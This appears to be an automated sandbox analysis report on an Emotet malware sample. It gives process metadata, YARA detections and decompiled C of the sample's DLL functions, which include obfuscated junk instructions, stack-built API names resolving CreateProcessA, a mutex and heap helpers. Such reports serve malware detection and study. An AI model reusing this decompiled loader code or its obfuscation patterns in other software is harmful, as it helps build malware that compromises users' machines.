Imagebase:	0x1180000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6100 Parent PID: 560

General

Start time:	16:49:03
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5896 Parent PID: 560

General

Start time:	16:49:19
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6932 Parent PID: 560

General

Start time:	16:49:35
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7096 Parent PID: 560

General

Start time:	16:49:45
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6320 Parent PID: 560

General

Start time:	16:50:11
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 5184 Parent PID: 7156 rundll32.exeCOMMON

Executed Functions

Function 6F30116B, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F30116B() {
				void* _v3;
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				struct _PROCESS_INFORMATION _v68;
				struct _STARTUPINFOA _v136;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t47;
				signed char _t53;
				signed int _t54;
				signed int* _t55;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t78;

				_push(cs);
				asm("enter 0x7df0, 0xa3");
				asm("fst qword [eax-0x2f]");
				asm("loope 0x62");
				_t67 =  *((_t63 &  *(_t63 + 0x64)) - 0x74fe66af) * 0xffffffc4;
				asm("in al, dx");
				_t54 = _t65 % _t53;
				asm("loopne 0xffffffd3");
				asm("scasd");
				asm("sbb [ebp+0x2830a69e], edx");
				asm("das");
				asm("out dx, al");
				_t55 = _t54 + 1;
				asm("sbb ebx, [eax]");
				asm("adc eax, 0x7f857c52");
				asm("aad 0xf2");
				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t78 = _t67 ^  *_t55;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t78 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *0xc3f0a76e =  *0xc3f0a76e + 0xc3f0a76e;
				 *0xc3f0a76e =  *0xc3f0a76e + 0xc3f0a76e;
				E6F31C640(0xc3f0a76e);
				E6F301426( &_v136, 0, 0x44);
				E6F301426( &_v68, 0, 0x10);
				_t26 =  &_v52; // 0x6e72656b
				_t45 = GetModuleHandleA(_t26);
				_t27 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t45, _t27);
				_t47 = _t45;
				_t29 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t47, _t29);
				if(CreateProcessA(0, _v12(), 0, 0, 1, 0, 0, 0,  &_v136,  &_v68) != 0) {
					 *0x6f346060 = _v68.hProcess;
					E6F31C650();
				}
				E6F31C630();
				L9:
				goto L9;
			}

0x6f30116b
0x6f30116c
0x6f301173
0x6f301176
0x6f301179
0x6f301180
0x6f301181
0x6f301183
0x6f301185
0x6f301188
0x6f30118e
0x6f30118f
0x6f301190
0x6f301191
0x6f301193
0x6f30119a
0x6f3011ad
0x6f3011b4
0x6f3011b6
0x6f3011b8
0x6f3011b9
0x6f3011bb
0x6f3011bf
0x6f3011c3
0x6f3011c6
0x6f3011cd
0x6f3011d4
0x6f3011da
0x6f3011de
0x6f3011e2
0x6f3011e9
0x6f3011f0
0x6f3011f7
0x6f3011fd
0x6f301201
0x6f301208
0x6f301208
0x6f30120a
0x6f30120b
0x6f30120d
0x6f30120f
0x6f30121f
0x6f30122f
0x6f301237
0x6f30123b
0x6f301242
0x6f30124d
0x6f301250
0x6f301251
0x6f30125c
0x6f301281
0x6f301286
0x6f30128b
0x6f30128b
0x6f301290
0x6f301295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F30123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F301247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F301256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F30127C

Strings

A, xrefs: 6F3011D9
GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245
kernel32, xrefs: 6F301237, 6F30123A
sA, xrefs: 6F3011F7

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleModuleProcess
String ID: A$GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1919063930-849291149
Opcode ID: ad6c38c2dd826e1e78f68a2f086779013d326b4043aa763ecb790cb14d837703
Instruction ID: 4b95fef364c1d19a2948c0639970a4aefa7cd8865b3d94fd39c0e57659049077
Opcode Fuzzy Hash: ad6c38c2dd826e1e78f68a2f086779013d326b4043aa763ecb790cb14d837703
Instruction Fuzzy Hash: FD31ADB1D08309EFEB01EFA4CD45BEEBB7AAF44B04F10855AE5406B284C7B55244DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F301035, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F301035(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, void* _a1) {
				void* _v3;
				void* _v8;
				void* _v12;
				void* _v13;
				void* _v15;
				void* _v19;
				void* _v23;
				void* _v27;
				void* _v28;
				void* _v29;
				void* _v31;
				void* _v35;
				void* _v39;
				void* _v43;
				void* _v44;
				void* _v52;
				void* _v64;
				void* _v68;
				void* _v69;
				void* _v93;
				void* _v136;
				void* _t75;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t109;

				_t94 = __edi;
				_t85 = __edx;
				_t81 = __ecx;
				_t75 = __ebx;
				_t109 = __eax - 0xad9570c6;
			}

0x6f301035
0x6f301035
0x6f301035
0x6f301035
0x6f301035

Strings

GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245
kernel32, xrefs: 6F301237, 6F30123A
sA, xrefs: 6F3011F7

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 0-1906453927
Opcode ID: d129d99a4690ba159cc1d5c0c1e2fd3044004556c62dac01d6599532ca8803e1
Instruction ID: efefe912e15a97099f4ffc6058db4cc5c8ff36ec237bf33c37f1441e3814182f
Opcode Fuzzy Hash: d129d99a4690ba159cc1d5c0c1e2fd3044004556c62dac01d6599532ca8803e1
Instruction Fuzzy Hash: 69414471D48349EBEB10EFB4C845BEEBBB9AF45B08F00854EE140AF284C7B49645CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6F3011A4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F3011A4() {
				void* _v3;
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				struct _PROCESS_INFORMATION _v68;
				struct _STARTUPINFOA _v136;
				intOrPtr* _t29;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t35;
				signed int* _t40;
				signed int _t48;
				signed int _t54;

				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t54 = _t48 ^  *_t40;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t54 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				E6F31C640(_t29);
				E6F301426( &_v136, 0, 0x44);
				E6F301426( &_v68, 0, 0x10);
				_t19 =  &_v52; // 0x6e72656b
				_t33 = GetModuleHandleA(_t19);
				_t20 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t33, _t20);
				_t35 = _t33;
				_t22 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t35, _t22);
				if(CreateProcessA(0, _v12(), 0, 0, 1, 0, 0, 0,  &_v136,  &_v68) != 0) {
					 *0x6f346060 = _v68.hProcess;
					E6F31C650();
				}
				E6F31C630();
				L7:
				goto L7;
			}

0x6f3011ad
0x6f3011b4
0x6f3011b6
0x6f3011b8
0x6f3011b9
0x6f3011bb
0x6f3011bf
0x6f3011c3
0x6f3011c6
0x6f3011cd
0x6f3011d4
0x6f3011da
0x6f3011de
0x6f3011e2
0x6f3011e9
0x6f3011f0
0x6f3011f7
0x6f3011fd
0x6f301201
0x6f301208
0x6f301208
0x6f30120a
0x6f30120b
0x6f30120d
0x6f30120f
0x6f30121f
0x6f30122f
0x6f301237
0x6f30123b
0x6f301242
0x6f30124d
0x6f301250
0x6f301251
0x6f30125c
0x6f301281
0x6f301286
0x6f30128b
0x6f30128b
0x6f301290
0x6f301295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F30123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F301247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F301256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F30127C

Part of subcall function 6F31C650: ExitProcess.KERNEL32 ref: 6F31C657

Strings

GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245
kernel32, xrefs: 6F301237, 6F30123A
sA, xrefs: 6F3011F7

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProcProcess$CreateExitHandleModule
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 3220508843-1906453927
Opcode ID: f9af32e7ed38e218cfd99393ced65bac7dde74a99d19c939244c511f3d1c6ea7
Instruction ID: d87e739da1d73efbff35f0a07451fab5f7c5ed0d1cb6c99f6cadec64fc02d715
Opcode Fuzzy Hash: f9af32e7ed38e218cfd99393ced65bac7dde74a99d19c939244c511f3d1c6ea7
Instruction Fuzzy Hash: 532146B1D44309EAEB10EFE4C945BEEBB79AF44B04F108549E640BA284DBB45644CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6F301167, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 67
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6F301167() {
				intOrPtr* _t25;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t31;
				void* _t43;
				void* _t44;
				void* _t48;

				if(_t48 != 0) {
					 *((intOrPtr*)(_t43 - 0x23)) = 0x616d6d6f;
					 *((intOrPtr*)(_t43 - 0x1f)) = 0x694c646e;
					 *((short*)(_t43 - 0x1b)) = 0x656e;
					 *((char*)(_t43 - 0x19)) = 0x41;
					 *((char*)(_t43 - 0x18)) = 0;
					 *((intOrPtr*)(_t43 - 0x17)) = 0x61657243;
					 *((intOrPtr*)(_t43 - 0x13)) = 0x72506574;
					 *((intOrPtr*)(_t43 - 0xf)) = 0x7365636f;
					 *((short*)(_t43 - 0xb)) = 0x4173;
					 *((char*)(_t43 - 9)) = 0;
					 *(_t43 - 8) = 0;
					 *(_t43 - 4) = 0;
				}
				_t44 = _t43 + 1;
				asm("cld");
				 *_t25 =  *_t25 + _t25;
				 *_t25 =  *_t25 + _t25;
				E6F31C640(_t25);
				E6F301426(_t44 - 0x84, 0, 0x44);
				E6F301426(_t44 - 0x40, 0, 0x10);
				_t15 = _t44 - 0x30; // 0x6e72656b
				_t29 = GetModuleHandleA(_t15);
				_t16 = _t44 - 0x27; // 0x43746547
				 *((intOrPtr*)(_t44 - 8)) = GetProcAddress(_t29, _t16);
				_t31 = _t29;
				_t18 = _t44 - 0x17; // 0x61657243
				 *((intOrPtr*)(_t44 - 4)) = GetProcAddress(_t31, _t18);
				if(CreateProcessA(0,  *((intOrPtr*)(_t44 - 8))(), 0, 0, 1, 0, 0, 0, _t44 - 0x84, _t44 - 0x40) != 0) {
					 *0x6f346060 =  *(_t44 - 0x40);
					E6F31C650();
				}
				E6F31C630();
				L6:
				goto L6;
			}

0x6f3011c3
0x6f3011c6
0x6f3011cd
0x6f3011d4
0x6f3011da
0x6f3011de
0x6f3011e2
0x6f3011e9
0x6f3011f0
0x6f3011f7
0x6f3011fd
0x6f301201
0x6f301208
0x6f301208
0x6f301209
0x6f30120a
0x6f30120b
0x6f30120d
0x6f30120f
0x6f30121f
0x6f30122f
0x6f301237
0x6f30123b
0x6f301242
0x6f30124d
0x6f301250
0x6f301251
0x6f30125c
0x6f301281
0x6f301286
0x6f30128b
0x6f30128b
0x6f301290
0x6f301295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F30123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F301247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F301256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F30127C

Strings

GetCommandLineCreateProcessA, xrefs: 6F301242, 6F301245
kernel32, xrefs: 6F301237, 6F30123A
sA, xrefs: 6F3011F7

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleModuleProcess
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1919063930-1906453927
Opcode ID: 42bd6cc4f63f6b4610c20310337f15764283c51ee97cc86929142b248f14c589
Instruction ID: 77a4446d7c052d107b18da30e299dc1aa94d0774db17c453d38f2baeb6ca7aee
Opcode Fuzzy Hash: 42bd6cc4f63f6b4610c20310337f15764283c51ee97cc86929142b248f14c589
Instruction Fuzzy Hash: 772159B1D04309EBEF11EFE0CC45BEEBB79AF45B04F10854AE240AA1C5D7B45644CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F301000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F301000() {
				long _t2;
				intOrPtr* _t4;

				CreateMutexA(0, 1, "7ce3e80173264ea19b05306b865eadf9"); // executed
				_t2 = GetLastError();
				 *_t4 =  *_t4 + _t2;
				return _t2;
			}

0x6f30100b
0x6f301011
0x6f301017
0x6f30101a

APIs

CreateMutexA.KERNELBASE(00000000,00000001,7ce3e80173264ea19b05306b865eadf9,6F301029,6F3010E6,6F319D3B,00000001,00000000), ref: 6F30100B
GetLastError.KERNEL32 ref: 6F301011

Strings

@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F301011

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9
API String ID: 1925916568-2035636723
Opcode ID: 40ccf2432cc1f75d8a5ad5d36abc574d0c38e8d15083cbeb4006460f39b4689b
Instruction ID: 8aa11959e0d29f8dfb188fba2402991f0cd014d22f45378112705bd2657c6ba3
Opcode Fuzzy Hash: 40ccf2432cc1f75d8a5ad5d36abc574d0c38e8d15083cbeb4006460f39b4689b
Instruction Fuzzy Hash: 1FC04CB0148B009BDB407F60D849B14B679AB83723F00451CB24144094DEA104648B21

Uniqueness

Uniqueness Score: -1.00%

Function 6F32288D, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F32288D(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t18 = __ecx;
				_push(__ecx);
				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E6F322856(_t26) - _t26 >> 1;
					_t7 = E6F3227A9(0, 0, _t26, E6F322856(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E6F31FEB1(_t18, _t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E6F3227A9(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E6F31FEFF(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x6f32288d
0x6f322892
0x6f32289c
0x6f3228a2
0x6f3228fd
0x6f3228fd
0x6f3228a4
0x6f3228b2
0x6f3228b8
0x6f3228c0
0x6f3228c5
0x00000000
0x6f3228c7
0x6f3228c8
0x6f3228cd
0x6f3228d2
0x6f3228f2
0x6f3228ec
0x6f3228ec
0x6f3228ee
0x6f3228ee
0x6f3228f5
0x6f3228fa
0x6f3228c5
0x6f322901
0x6f322904
0x6f322904
0x6f322912

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6F322896
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F322904

Part of subcall function 6F3227A9: WideCharToMultiByte.KERNEL32(?,00000000,6F32084A,00000000,00000001,6F3207E3,6F323ABD,?,6F32084A,?,00000000,?,6F323834,0000FDE9,00000000,?), ref: 6F32284B

Part of subcall function 6F31FEB1: RtlAllocateHeap.NTDLL(00000000,6F35E844,6F35E824,?,6F31C421,00000000,6F35E844,00000000), ref: 6F31FEE3

_free.LIBCMT ref: 6F3228F5

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: fd3ff6d1bcdd6e84b2e56e9ffbdeff446188da1fc576ae58c5f66257e1a1df5a
Instruction ID: 8aee30954fd766b204fda49cf1ebaf3824ca4da8d5f1b3faaf20e93be692b809
Opcode Fuzzy Hash: fd3ff6d1bcdd6e84b2e56e9ffbdeff446188da1fc576ae58c5f66257e1a1df5a
Instruction Fuzzy Hash: B401D472A157157B772145BE0E88CBB2AEDDED3AB4311012ABE14C2240EF62CC1191F1

Uniqueness

Uniqueness Score: -1.00%

Function 6F3201B7, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6F3201B7(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f35e7c8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F322E3C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F3201A4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6F322A43(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6f3201b7
0x6f3201bd
0x6f3201c2
0x6f3201d0
0x6f3201d0
0x6f3201d6
0x6f3201d8
0x6f3201d8
0x6f3201ef
0x6f3201f8
0x6f320200
0x00000000
0x00000000
0x6f3201e0
0x6f3201e2
0x6f320204
0x6f320209
0x6f32020f
0x00000000
0x6f32020f
0x6f3201e5
0x6f3201ea
0x6f3201eb
0x6f3201ed
0x00000000
0x00000000
0x6f3201ed
0x00000000
0x6f3201ef
0x6f3201c8
0x6f3201ce
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6F3211DC,00000001,00000364,00000006,000000FF,?,6F31C421,00000000,6F35E844,00000000), ref: 6F3201F8

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bc560ab62cde5dd81d58804bf3dac7bb376fa2dc39494ef09e6efdf302a32ad2
Instruction ID: eddc385f60d2c3612d23003008b8936f9c5d65721be737e24c137f43586089e5
Opcode Fuzzy Hash: bc560ab62cde5dd81d58804bf3dac7bb376fa2dc39494ef09e6efdf302a32ad2
Instruction Fuzzy Hash: BEF0B4B554472467FB114A26CD10B8F3BDD9F82770F00A117AC28AA180CB31F50886E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F31FEB1, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F31FEB1(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F3201A4(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f35e7c8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F322E3C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6F322A43(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6f31feb1
0x6f31feb7
0x6f31febd
0x6f31feef
0x6f31fef4
0x6f31fefa
0x00000000
0x6f31fefa
0x6f31fec1
0x6f31fec3
0x6f31fec3
0x6f31feda
0x6f31fee3
0x6f31feeb
0x00000000
0x00000000
0x6f31fecb
0x6f31fecd
0x00000000
0x00000000
0x6f31fed0
0x6f31fed5
0x6f31fed6
0x6f31fed8
0x00000000
0x00000000
0x6f31fed8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,6F35E844,6F35E824,?,6F31C421,00000000,6F35E844,00000000), ref: 6F31FEE3

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

